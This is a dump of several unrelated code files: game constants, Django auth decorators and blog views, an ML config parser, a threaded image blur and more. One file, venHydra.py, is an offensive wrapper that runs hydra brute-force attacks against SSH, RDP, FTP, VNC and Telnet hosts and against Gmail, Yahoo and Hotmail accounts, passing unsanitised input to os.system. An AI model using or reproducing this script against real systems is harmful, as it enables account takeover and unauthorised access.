+{"seq_id":"339204283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# window dimensions\nw_width = 1200\nw_height = 700\n\nplayerPath1 = ['assets/sprites/modern/','serge_run.png']\nplayerPath2 = ['assets/sprites/player/hetalia/','hetalia.png']\nplayerPath3 = ['assets/sprites/player/serge/','serge.png']\nwolfPath = ['assets/sprites/enemies/wolf/','wolf.png']\nbearPath = ['assets/sprites/enemies/scaryBear/','scaryBear.png']\narmBearPath = ['assets/sprites/enemies/armouredBear/','bear.png']\nblobPath = ['assets/sprites/enemies/blob/','blob.png']\nitemPath = ['assets/sprites/items/','crystal.png']\n\n# misc\ncolors = {'black': (0,0,0) , 'blue':(0,0,255),'green':(0,255,0),'red':(255,0, 0),'white':(255,255,255)}\nplayerSpeed = 15 # initial player speed\n\nprototype_text = [\"--KEITH IS GONE.\",\n \"...\",\n \"Keith is gone?\",\n \"That doesn't sound good.\",\n \"What does that mean? Where did Keith go?\",\n \"...\",\n \"Who is Keith?\",\n \"--THERE MAY BE A WAY FOR YOU TO RETRIEVE HIM.\",\n \"How am I supposed to retrieve him?\",\n \"--TRY THAT TIME MACHINE OVER THERE.\",\n \"Oh.\",\n \"--GO ON.\",\n \"Okay.\",\n \"Uh oh.\",\n \"I think I broke the time machine.\",\n \"...\",\n \"Yeah, it's definitely broken.\",\n \"There are pieces, like, everywhere.\",\n \"What am I supposed to do now?\",\n \"--PRESS ANY KEY TO CONTINUE.\"]\n","sub_path":"current version/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"45695753","text":"# -*- coding: utf-8 -*-\n\nimport functools\nimport logging\nlog = logging.getLogger(\"django\")\n\n# 管理员登录权限-装饰器\ndef mgr_login_required(func):\n user_type = \"mgr_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 普通app 用户登录权限-装饰器\ndef app_user_login_required(func):\n user_type = \"app_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 物业帐号登录权限-装饰器\ndef wuey_user_login_required(func):\n user_type = \"wuye_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 通用登录权限-装饰器\ndef common_login_required(func):\n user_type = \"common\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# aio, gate 登录权限-装饰器\ndef public_dev_login_required(func):\n user_type = \"public_device\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# wuey_user, aio, gate 登录权限-装饰器\ndef community_login_required(func):\n user_type = \"community\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n\n# 权限登录装饰器\ndef login_required(user_type):\n \"\"\"\n 登录权限验证\n :param user_type: mgr_user, wuye_user, app_user, gate, common, public_device\n :notice:common指允许所有类型的客户端\n \"\"\"\n\n def out_wrapper(func):\n @functools.wraps(func)\n def in_wrapper(self, *args, **kwargs):\n _map = {\n 'common': ['mgr_user', 'wuye_user', 'app_user', 'gate', 'aio'],\n 'community': ['aio', 'gate', 'wuye_user'],\n 'public_device': ['aio', 'gate'],\n }\n\n result = {'err': 0, 'msg': '', 'data': {}}\n\n if not self.request:\n result['err'] = 1\n result['msg'] = '未设置Request对象'\n return result\n\n elif not self.request.session.get(\"is_logined\", False):\n result['err'] = 2\n result['msg'] = '用户/设备未登录'\n return result\n\n log.debug(\"input_user_type:%s, user_type:%s\", user_type, self.request.session.get(\"user_type\", \"\"))\n\n if user_type in ['common', 'public_device', 'community'] and (self.request.session.get(\"user_type\", \"\") not in _map[user_type]):\n result['err'] = 4\n result['msg'] = '操作未授权'\n\n elif user_type in ['mgr_user', 'wuye_user', 'app_user', 'gate', 'aio'] and user_type != self.request.session.get(\"user_type\", \"\"):\n result['err'] = 4\n result['msg'] = '操作未授权'\n\n else:\n result = func(self, *args, **kwargs)\n \n return result\n return in_wrapper\n return out_wrapper\n","sub_path":"jmws/src/utils/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"597719913","text":"import threading\nimport queue as queue\nimport os\nfrom constant import Constant\nimport shutil\nimport requests\nclass SendRequestTask(threading.Thread):\n def __init__(self,result_queue,req_path,resp_path):\n threading.Thread.__init__(self)\n self.queue=result_queue\n self.req_path=req_path\n self.resp_path=resp_path\n def run(self):\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n for root, subdirs, files in os.walk(self.req_path):\n for name in files:\n #full_path example\n #C:\\Users\\fengmingy\\Desktop\\CBA_Test\\DnB Commercial\\1.0 Company Basic Details\\DCom-01.01.01_exp.xml\n full_path=os.path.realpath(os.path.join(root,name))\n # C:\\Users\\fengmingy\\Desktop\\CBA_Test\\1\\2\\3 i only need \\1\\2\\3 this part. +1 is because need to get rid of the first \\\n # print(os.path.join(self.req_path,root[len(self.req_path)+1:]))\n response_path=os.path.join(self.resp_path,root[len(self.req_path)+1:])\n #C:/Users/fengmingy/Desktop/CBA_Test/CBA_Comm_Request\\response\\DnB_TC_4311_req.xml fix this\n response_xml=os.path.join(response_path,name).replace(\"\\\\\",\"/\")\n # print(root)\n # print(response_path)\n # print(response_xml)\n #cant create a file in a directory that doesnt exist. so need to create that directory first\n dir = os.path.dirname(response_xml)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n # #remove rsp file from CBA test folder\n # file_name=full_path.split(\"\\\\\")[-1]\n # if (file_name.find(\"rsp\")!=-1):\n # print (\"remove \"+full_path)\n # os.remove(full_path)\n\n # move the exptected response file to another folder\n # file_name=full_path.split(\"\\\\\")[-1]\n # if(file_name.find(\"exp\")!=-1):#find expected response file\n # shutil.move(full_path,os.path.join(dir,file_name))\n\n with open(full_path,'rb') as payload:\n #post reqeust to the url\n if(full_path.find(\"Comm\")!=-1):\n host_url=Constant.HOST_URL.COMMERICAL_URL\n else:\n host_url=Constant.HOST_URL.CONSUMER_URL\n resp=requests.post(host_url,data=payload,headers=headers)\n file=open(response_xml,'w')\n file.write(resp.text)\n self.queue.put(full_path+\" processed\")\n\n","sub_path":"test_automation_webservices/worker/WebServiceTask.py","file_name":"WebServiceTask.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"221240718","text":"import os\nimport sys\n \nlist = \"\"\"\n \n========<[VenHydra]>========\n \n[1] VNC Bruteforce\n[2] SSH Bruteforce\n[3] FTP Bruteforce\n[4] TELNET Bruteforce\n[5] RDP Bruteforce\n[6] YAHOO Bruteforce\n[7] HOTMAIL Bruteforce\n[8] GMAIL Bruteforce\n \n\"\"\"\n \ndef vnc():\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -P %s -e n -t 1 %s vnc -V\" % (word, iphost))\n \ndef ftp():\n \n iphost = raw_input(\"[+] IP/Hostname : \")\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s %s ftp\" % (user, word, iphost))\n sys.exit()\ndef gmail():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 465 smtp.gmail.com smtp\" % (email, word))\n sys.exit()\n \ndef ssh():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -l %s -P %s %s ssh\" % (user, word, iphost))\n sys.exit()\n \n \ndef telnet():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -l %s -P %s %s telnet\" % (user, word, iphost))\n sys.exit()\n \ndef yahoo():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp\" % (email, word))\n sys.exit()\ndef hotmail():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 587 smtp.live.com smtp\" % (email, word))\n sys.exit()\n \ndef rdp():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -t 1 -V -f -l %s -P %s %s rdp\" % (user, word, iphost))\n sys.exit()\n \n \n \n####COD3D BY V3N0M\n \ndef main():\n v_dra = input(\"[+] Choose one: \")\n if v_dra == 1:\n vnc()\n elif v_dra == 2:\n ssh()\n elif v_dra == 3:\n ftp()\n elif v_dra == 4:\n telnet()\n elif v_dra == 5:\n rdp()\n elif v_dra == 6:\n yahoo()\n elif v_dra == 7:\n hotmail()\n elif v_dra == 8:\n gmail()\n else:\n print(\"Wrong Command\")\n \nif __name__ == \"__main__\":\n os.system('clear')\n print(list)\n \n main()\n","sub_path":"venHydra.py","file_name":"venHydra.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131384732","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport io\nimport os\nimport sys\nfrom shutil import copyfile\nfrom dataset import Vocab, Embeddings, Replace\n\nclass Config():\n\n def __init__(self, argv):\n self.usage=\"\"\"usage: {}\n* -mdir FILE : directory to save/restore models\n\n -seq_size INT : sentences larger than this number of src/tgt words are filtered out [50]\n -batch_size INT : number of examples per batch [32]\n -seed INT : seed for randomness [1234]\n -debug : debug mode \n\n [LEARNING OPTIONS]\n* -trn FILE : training data\n -dev FILE : validation data\n\n -src_voc FILE : vocabulary of src words (needed to initialize learning)\n -tgt_voc FILE : vocabulary of tgt words (needed to initialize learning)\n -src_emb FILE : embeddings of src words (needed to initialize learning)\n -tgt_emb FILE : embeddings of tgt words (needed to initialize learning)\n\n -src_replace FILE : equivalent sequences (needed when -data_mode r)\n\n To compute src-side encoding vectors:\n -src_k1 INT : src kernel1 size [3]\n -src_k1_size INT : hidden units for src kernel1 [256]\n -src_k2 INT : src kernel2 size [3]\n -src_k2_size INT : hidden units for src kernel2 [256]\n or:\n -src_lstm_size INT : hidden units for src bi-lstm [0] (if activated convolutions are not used)\n\n To compute tgt-side encoding vectors:\n -tgt_k1 INT : tgt kernel1 size [3]\n -tgt_k1_size INT : hidden units for tgt kernel1 [256]\n -tgt_k2 INT : tgt kernel2 size [3]\n -tgt_k2_size INT : hidden units for tgt kernel2 [256] (MUST be equal to -src_k2_size)\n or:\n -tgt_lstm_size INT : hidden units for tgt bi-lstm [0] (if activated convolutions are not used)\n\n -lr FLOAT : initial learning rate [0.1]\n -lr_decay FLOAT : learning rate decay [0.9]\n -lr_method STRING : GD method either: adam, adagrad, adadelta, sgd, rmsprop [adagrad]\n -aggr TYPE : aggregation operation: sum, max, lse [lse]\n -r FLOAT : r for lse [1.0]\n -dropout FLOAT : dropout ratio [0.3]\n -net_mode STRING : mode (alignment, sentence) [alignment]\n -data_mode STRING : how data examples are generated (p: parallel, u:uneven, i:insert, r:replace d:delete) [p]\n -max_sents INT : Consider this number of sentences per batch (0 for all) [0]\n -n_epochs INT : train for this number of epochs [1]\n -report_every INT : report every this many batches [1000]\n\n [INFERENCE OPTIONS]\n* -model FILE : model to restore\n* -tst FILE : testing data\n -min_score FLOAT : min score to consider alignment [0.0]\n -min_seq INT : min sequence of consecutive unaligned src/tgt words to consider divergence [1]\n -show_matrix : output formatted alignment matrix (net_mode must be alignment)\n -show_svg : output alignment matrix using svg-like html format (net_mode must be alignment)\n -show_last : output source/target last vectors\n -show_aggr : output source/target aggr vectors\n -show_align : output source/target alignment matrix\n -fix INT : output INT corrected sentence pairs [0]\n -tau INT : min number of words for corrected sentences [2]\n -max_sim FLOAT : sentences with lower similarity score than this are fixed [0.1]\n\n- Options marked with * must be set. 
The rest have default values.\n- If -mdir exists in learning mode, learning continues after restoring the last model\n- Training data is shuffled at every epoch\n\"\"\".format(sys.argv.pop(0))\n\n self.emb_src = None # object with embeddings\n self.emb_tgt = None # object with embeddings\n\n self.src_voc = None\n self.tgt_voc = None\n self.src_emb = None\n self.src_replace = None\n self.tgt_emb = None\n self.src_voc_size = None\n self.tgt_voc_size = None\n self.src_emb_size = None\n self.tgt_emb_size = None\n self.mdir = None\n self.model = None\n self.trn = None\n self.dev = None\n self.tst = None\n\n self.src_k1 = 3\n self.src_k1_size = 256\n self.src_k2 = 3\n self.src_k2_size = 256\n\n self.tgt_k1 = 3\n self.tgt_k1_size = 256\n self.tgt_k2 = 3\n self.tgt_k2_size = 256\n\n self.src_lstm_size = 0\n self.tgt_lstm_size = 0\n\n self.aggr = \"lse\"\n self.r = 1.0\n self.dropout = 0.3\n self.lr = 0.1\n self.lr_decay = 0.9\n self.lr_method = \"adagrad\"\n\n self.seq_size = 50\n self.batch_size = 32\n self.max_sents = 0\n self.n_epochs = 1\n self.epoch = 0 # epochs already run\n self.seed = 1234\n self.report_every = 1000\n self.debug = False\n self.data_mode = \"p\"\n self.net_mode = \"alignment\"\n\n self.min_score = 0.0\n self.min_seq = 2\n self.remove_source = True\n self.remove_target = True\n self.show_matrix = False\n self.show_svg = False\n self.show_last = False\n self.show_aggr = False\n self.show_align = False\n self.fix = 0\n self.tau = 2\n self.max_sim = 0.1\n\n self.parse(sys.argv)\n\n tf.set_random_seed(self.seed)\n np.random.seed(self.seed)\n\n if not self.mdir:\n sys.stderr.write(\"error: Missing -mdir option\\n{}\".format(self.usage))\n sys.exit()\n\n if self.tst: self.inference()\n if self.trn: self.learn()\n return\n\n def inference(self):\n self.dropout = 0.0\n self.seq_size = 0\n if not os.path.exists(self.model + '.index'):\n sys.stderr.write('error: -model file {} cannot be find\\n'.format(self.model + '.index'))\n sys.exit()\n if not os.path.exists(self.tst):\n sys.stderr.write('error: -tst file {} cannot be find\\n'.format(self.tst))\n sys.exit()\n if not os.path.exists(self.mdir + '/topology'): \n sys.stderr.write('error: topology file: {} cannot be find\\n'.format(self.mdir + '/topology'))\n sys.exit()\n argv = []\n with open(self.mdir + \"/topology\", 'r') as f:\n for line in f:\n opt, val = line.split()\n argv.append('-'+opt)\n argv.append(val)\n self.parse(argv) ### this overrides options passed in command line\n\n ### read vocabularies\n self.voc_src = Vocab(self.mdir + \"/vocab_src\") \n self.voc_tgt = Vocab(self.mdir + \"/vocab_tgt\")\n self.replace_src = None\n return \n\n def learn(self):\n if not os.path.exists(self.trn):\n sys.stderr.write('error: -trn file {} cannot be find\\n'.format(self.trn))\n sys.exit()\n if self.dev is not None and not os.path.exists(self.dev):\n sys.stderr.write('error: -dev file {} cannot be find\\n'.format(self.dev))\n sys.exit()\n ###\n ### continuation\n ###\n if os.path.exists(self.mdir): \n if not os.path.exists(self.mdir + '/topology'): \n sys.stderr.write('error: topology file: {} cannot be find\\n'.format(self.mdir + '/topology'))\n sys.exit()\n if not os.path.exists(self.mdir + '/checkpoint'): \n sys.stderr.write('error: checkpoint file: {} cannot be find\\ndelete dir {} ???\\n'.format(self.mdir + '/checkpoint', self.mdir))\n sys.exit()\n\n argv = []\n with open(self.mdir + \"/topology\", 'r') as f:\n for line in f:\n opt, val = line.split()\n argv.append('-'+opt)\n argv.append(val)\n self.parse(argv) ### this overrides 
options passed in command line\n ### read vocabularies\n self.voc_src = Vocab(self.mdir + \"/vocab_src\") \n self.voc_tgt = Vocab(self.mdir + \"/vocab_tgt\")\n ### read replace\n if self.src_replace: self.replace_src = Replace(self.src_replace)\n else: self.replace_src = None\n ### update last epoch\n for e in range(999,1,-1):\n if os.path.exists(self.mdir+\"/epoch{}.index\".format(e)): \n self.epoch = e\n break\n print(\"learning continuation: last epoch is {}\".format(self.epoch))\n ###\n ### learning from scratch\n ###\n else:\n self.voc_src = Vocab(self.src_voc) ### read file or config/vocab_src if file is not set\n self.src_voc_size = self.voc_src.length\n self.voc_tgt = Vocab(self.tgt_voc) ### read file or config/vocab_tgt if file is not set\n self.tgt_voc_size = self.voc_tgt.length\n ### read replace\n if self.src_replace: self.replace_src = Replace(self.src_replace)\n else: self.replace_src = None\n\n if not os.path.exists(self.mdir): os.makedirs(self.mdir)\n #copy vocabularies\n copyfile(self.src_voc, self.mdir + \"/vocab_src\")\n copyfile(self.tgt_voc, self.mdir + \"/vocab_tgt\")\n #read embeddings\n self.emb_src = Embeddings(self.src_emb,self.voc_src) ### read file or use emb_src.length if file is not set\n self.src_emb_size = self.emb_src.dim\n self.emb_tgt = Embeddings(self.tgt_emb,self.voc_tgt) ### read file or use emb_tgt.length if file is not set\n self.tgt_emb_size = self.emb_tgt.dim\n #write topology file\n with open(self.mdir + \"/topology\", 'w') as f: \n for opt, val in vars(self).items():\n if opt.startswith(\"src\") or opt.startswith(\"tgt\") or opt==\"aggr\": f.write(\"{} {}\\n\".format(opt,val))\n print(\"learning from scratch\")\n return \n\n\n def parse(self, argv):\n while len(argv):\n tok = argv.pop(0)\n if (tok==\"-mdir\" and len(argv)):\n self.mdir = argv.pop(0)\n elif (tok==\"-model\" and len(argv)):\n self.model = argv.pop(0)\n elif (tok==\"-src_voc\" and len(argv)):\n self.src_voc = argv.pop(0)\n elif (tok==\"-tgt_voc\" and len(argv)):\n self.tgt_voc = argv.pop(0)\n elif (tok==\"-src_emb\" and len(argv)):\n self.src_emb = argv.pop(0)\n elif (tok==\"-tgt_emb\" and len(argv)):\n self.tgt_emb = argv.pop(0)\n elif (tok==\"-src_replace\" and len(argv)):\n self.src_replace = argv.pop(0)\n elif (tok==\"-src_voc_size\" and len(argv)):\n self.src_voc_size = int(argv.pop(0))\n elif (tok==\"-tgt_voc_size\" and len(argv)):\n self.tgt_voc_size = int(argv.pop(0))\n elif (tok==\"-src_emb_size\" and len(argv)):\n self.src_emb_size = int(argv.pop(0))\n elif (tok==\"-tgt_emb_size\" and len(argv)):\n self.tgt_emb_size = int(argv.pop(0))\n elif (tok==\"-trn\" and len(argv)):\n self.trn = argv.pop(0)\n elif (tok==\"-dev\" and len(argv)):\n self.dev = argv.pop(0)\n elif (tok==\"-tst\" and len(argv)):\n self.tst = argv.pop(0)\n elif (tok==\"-max_sents\" and len(argv)):\n self.max_sents = int(argv.pop(0))\n elif (tok==\"-debug\"):\n self.debug = True\n elif (tok==\"-seed\" and len(argv)):\n self.seed = int(argv.pop(0))\n elif (tok==\"-report_every\" and len(argv)):\n self.report_every = int(argv.pop(0))\n elif (tok==\"-n_epochs\" and len(argv)):\n self.n_epochs = int(argv.pop(0))\n\n elif (tok==\"-src_lstm_size\" and len(argv)):\n self.src_lstm_size = int(argv.pop(0))\n elif (tok==\"-tgt_lstm_size\" and len(argv)):\n self.tgt_lstm_size = int(argv.pop(0))\n\n elif (tok==\"-src_k1\" and len(argv)):\n self.src_k1 = int(argv.pop(0))\n elif (tok==\"-src_k2\" and len(argv)):\n self.src_k2 = int(argv.pop(0))\n elif (tok==\"-src_k1_size\" and len(argv)):\n self.src_k1_size = 
int(argv.pop(0))\n elif (tok==\"-src_k2_size\" and len(argv)):\n self.src_k2_size = int(argv.pop(0))\n elif (tok==\"-tgt_k1\" and len(argv)):\n self.tgt_k1 = int(argv.pop(0))\n elif (tok==\"-tgt_k2\" and len(argv)):\n self.tgt_k2 = int(argv.pop(0))\n elif (tok==\"-tgt_k1_size\" and len(argv)):\n self.tgt_k1_size = int(argv.pop(0))\n elif (tok==\"-tgt_k2_size\" and len(argv)):\n self.tgt_k2_size = int(argv.pop(0))\n\n elif (tok==\"-seq_size\" and len(argv)):\n self.seq_size = int(argv.pop(0))\n elif (tok==\"-batch_size\" and len(argv)):\n self.batch_size = int(argv.pop(0))\n elif (tok==\"-aggr\" and len(argv)):\n self.aggr = argv.pop(0)\n elif (tok==\"-r\" and len(argv)):\n self.r = float(argv.pop(0))\n elif (tok==\"-dropout\" and len(argv)):\n self.dropout = float(argv.pop(0))\n elif (tok==\"-lr\" and len(argv)):\n self.lr = float(argv.pop(0))\n elif (tok==\"-lr_decay\" and len(argv)):\n self.lr_decay = float(argv.pop(0))\n elif (tok==\"-lr_method\" and len(argv)):\n self.lr_method = argv.pop(0)\n elif (tok==\"-data_mode\" and len(argv)):\n self.data_mode = argv.pop(0)\n elif (tok==\"-net_mode\" and len(argv)):\n self.net_mode = argv.pop(0)\n\n elif (tok==\"-min_score\" and len(argv)):\n self.min_score = float(argv.pop(0))\n elif (tok==\"-min_seq\" and len(argv)):\n self.min_seq = int(argv.pop(0))\n elif (tok==\"-show_matrix\"):\n self.show_matrix = True\n elif (tok==\"-show_svg\"):\n self.show_svg = True\n elif (tok==\"-show_aggr\"):\n self.show_aggr = True\n elif (tok==\"-show_last\"):\n self.show_last = True\n elif (tok==\"-show_align\"):\n self.show_align = True\n elif (tok==\"-fix\" and len(argv)):\n self.fix = int(argv.pop(0))\n elif (tok==\"-tau\" and len(argv)):\n self.tau = int(argv.pop(0))\n elif (tok==\"-max_sim\" and len(argv)):\n self.max_sim = float(argv.pop(0))\n\n elif (tok==\"-h\"):\n sys.stderr.write(\"{}\".format(self.usage))\n sys.exit()\n else:\n sys.stderr.write('error: unparsed {} option\\n'.format(tok))\n sys.stderr.write(\"{}\".format(self.usage))\n sys.exit()\n\n if self.tgt_k2_size != self.src_k2_size: \n sys.stderr.write('error: -tgt_k2_size and -src_k2_size cannot be different\\n')\n sys.exit()\n\n if self.src_lstm_size > 0:\n self.src_k1 = 0\n self.src_k1_size = 0\n self.src_k2 = 0\n self.src_k2_size = 0\n\n if self.tgt_lstm_size > 0:\n self.tgt_k1 = 0\n self.tgt_k1_size = 0\n self.tgt_k2 = 0\n self.tgt_k2_size = 0\n\n self.npad_src = (self.src_k1 + self.src_k2) / 2 - 1 ### used to build datasets\n self.npad_tgt = (self.tgt_k1 + self.tgt_k2) / 2 - 1 ### used to build datasets\n\n\n def write_config(self):\n if not os.path.exists(self.mdir): \n os.makedirs(self.mdir)\n file = self.mdir + \"/epoch\"+str(self.epoch)+\".config\"\n with open(file,\"w\") as f:\n for name, val in vars(self).items():\n if name==\"usage\" or name.startswith(\"emb_\") or name.startswith(\"voc_\"): continue\n f.write(\"{} {}\\n\".format(name,val))\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
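The hand-rolled parse() loop in config.py predates (or deliberately avoids) argparse. For comparison, a few of its options in argparse form; a sketch, not a replacement, since the original also re-parses saved topology files through the same loop:

import argparse

parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-mdir')                           # model directory
parser.add_argument('-batch_size', type=int, default=32)
parser.add_argument('-lr', type=float, default=0.1)
parser.add_argument('-debug', action='store_true')
cfg = parser.parse_args(['-mdir', 'models', '-lr', '0.05'])
print(cfg.mdir, cfg.batch_size, cfg.lr, cfg.debug)     # models 32 0.05 False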
+{"seq_id":"406635477","text":"import threading\nimport cv2\nimport numpy as np\n\n\ndef get_menu():\n menu = \"\\n\"\n menu += \"1. Run\\n\"\n menu += \"2. Change number of threads\\n\"\n menu += \"3. Change kernel size\\n\"\n menu += \"0. Exit\\n\"\n return menu\n\n\nclass FilterThread(threading.Thread):\n def __init__(self, thread_id, start_index):\n threading.Thread.__init__(self)\n self.__thread_id = thread_id\n self.__start_index = start_index\n\n def run(self):\n row = self.__start_index // width\n col = self.__start_index % width\n\n for i in range(slave_size):\n # compute the mean value for current pixel\n red_sum = 0\n green_sum = 0\n blue_sum = 0\n\n for k in range(-half_size, half_size + 1):\n for l in range(-half_size, half_size + 1):\n if (0 <= row + k < height) and (0 <= col + l < width):\n red_sum += img[row + k, col + l, 2]\n green_sum += img[row + k, col + l, 1]\n blue_sum += img[row + k, col + l, 0]\n\n red_sum //= kernel_size * kernel_size\n green_sum //= kernel_size * kernel_size\n blue_sum //= kernel_size * kernel_size\n\n result[row, col] = [blue_sum, green_sum, red_sum]\n\n # move to the next pixel\n col += 1\n if col == width:\n col = 0\n row += 1\n\n print(\"Exit thread \" + str(self.__thread_id))\n\n\nimg = cv2.imread(\"images/source/kids.bmp\", cv2.IMREAD_COLOR)\nheight, width = img.shape[:2]\nresult = np.zeros((height, width, 3), np.uint8)\nimg_size = height * width\n\n\nnr_threads = 10\nkernel_size = 5\nmenu = get_menu()\nrun = True\nwhile run:\n print(\"\\nCurrent number of threads: \" + str(nr_threads))\n print(\"Current kernel size: \" + str(kernel_size))\n print(menu)\n\n command = input(\"Give command: \")\n\n if command == \"2\":\n nr_threads = int(input(\"Give the number of threads: \"))\n\n elif command == \"3\":\n kernel_size = int(input(\"Give the kernel size: \"))\n\n elif command == \"0\":\n run = False\n\n elif command == \"1\":\n threads = []\n master_size = img_size % (nr_threads - 1)\n slave_size = img_size // (nr_threads - 1)\n half_size = kernel_size // 2\n\n for i in range(nr_threads - 1):\n thread = FilterThread(i, i * slave_size)\n thread.start()\n threads.append(thread)\n\n # master computation\n start_index = (nr_threads - 1) * slave_size\n row = start_index // width\n col = start_index % width\n\n for i in range(master_size):\n # compute the mean value for current pixel\n red_sum = 0\n green_sum = 0\n blue_sum = 0\n\n for k in range(-half_size, half_size + 1):\n for l in range(-half_size, half_size + 1):\n if (0 <= row + k < height) and (0 <= col + l < width):\n red_sum += img[row + k, col + l, 2]\n green_sum += img[row + k, col + l, 1]\n blue_sum += img[row + k, col + l, 0]\n\n red_sum //= kernel_size * kernel_size\n green_sum //= kernel_size * kernel_size\n blue_sum //= kernel_size * kernel_size\n\n result[row, col] = [blue_sum, green_sum, red_sum]\n\n # move to the next pixel\n col += 1\n if col == width:\n col = 0\n row += 1\n\n for t in threads:\n t.join()\n\n cv2.imshow(\"Source image\", img)\n cv2.imshow(\"Blurred image\", result)\n cv2.waitKey(0)\n\n print(\"Exit main thread\")\n\n else:\n print(\"Invalid command\")\n","sub_path":"theads.py","file_name":"theads.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"307941226","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Post\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\ndef news_all(request):\n post_all = Post.objects.filter(draft=True, published__lte=timezone.now()).order_by('-published')\n page = request.GET.get('page', 1)\n\n paginator = Paginator(post_all, 2)\n try:\n post_all = paginator.page(page)\n except PageNotAnInteger:\n post_all = paginator.page(1)\n except EmptyPage:\n post_all = paginator.page(paginator.num_pages)\n\n return render(request, 'news_all.html', {'post_all': post_all})\n\n\ndef category_detail(request, slug):\n category = Category.objects.get(slug=slug)\n post_category = Post.objects.filter(category=category, draft=True,\n published__lte=timezone.now()).order_by('-published')\n page = request.GET.get('page', 1)\n\n paginator = Paginator(post_category, 2)\n try:\n post_category = paginator.page(page)\n except PageNotAnInteger:\n post_category = paginator.page(1)\n except EmptyPage:\n post_category = paginator.page(paginator.num_pages)\n return render(request, 'category_detail.html', {'category': category, 'post_category': post_category})\n\n\ndef post_detail(request, slug):\n post = get_object_or_404(Post, slug=slug)\n return render(request, 'post.html', {'post': post})\n\n\ndef get_tags(request, slug):\n posts = Post.objects.get_queryset().filter(tags__slug=slug)\n return render(request, 'tag_page.html', {'posts': posts})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"288973191","text":"from utils.decorators import singleton\nfrom models.error import Error\nfrom models.type_error import get_type_error\nfrom views.data_window import DataWindow\n\n\n@singleton\nclass ErrorController(object):\n def __init__(self):\n self._idError = 0\n self._errorsList = []\n\n def getList(self):\n return self._errorsList\n\n def destroy(self):\n self._idError = 0\n self._errorsList = []\n\n def add(self, noType, errorType, desc, line, column):\n numberError, description = get_type_error(noType)\n self._idError += 1\n description += desc\n\n self._errorsList.append(Error(self._idError, errorType, numberError,\n description, line, column))\n DataWindow().consoleTable(['Code', 'Description'],\n [[numberError, description]])\n","sub_path":"parser/team28/controllers/error_controller.py","file_name":"error_controller.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
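The @singleton decorator above comes from utils.decorators, which this record does not include; a common implementation consistent with this usage (one shared instance per decorated class) is sketched below as an assumption, not the project's actual code:

def singleton(cls):
    """Create cls at most once and hand back the same instance afterwards."""
    instances = {}

    def get_instance(*args, **kwargs):
        if cls not in instances:
            instances[cls] = cls(*args, **kwargs)
        return instances[cls]
    return get_instance

With such a decorator, ErrorController() is ErrorController() evaluates to True, which is what lets add() accumulate errors across call sites.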
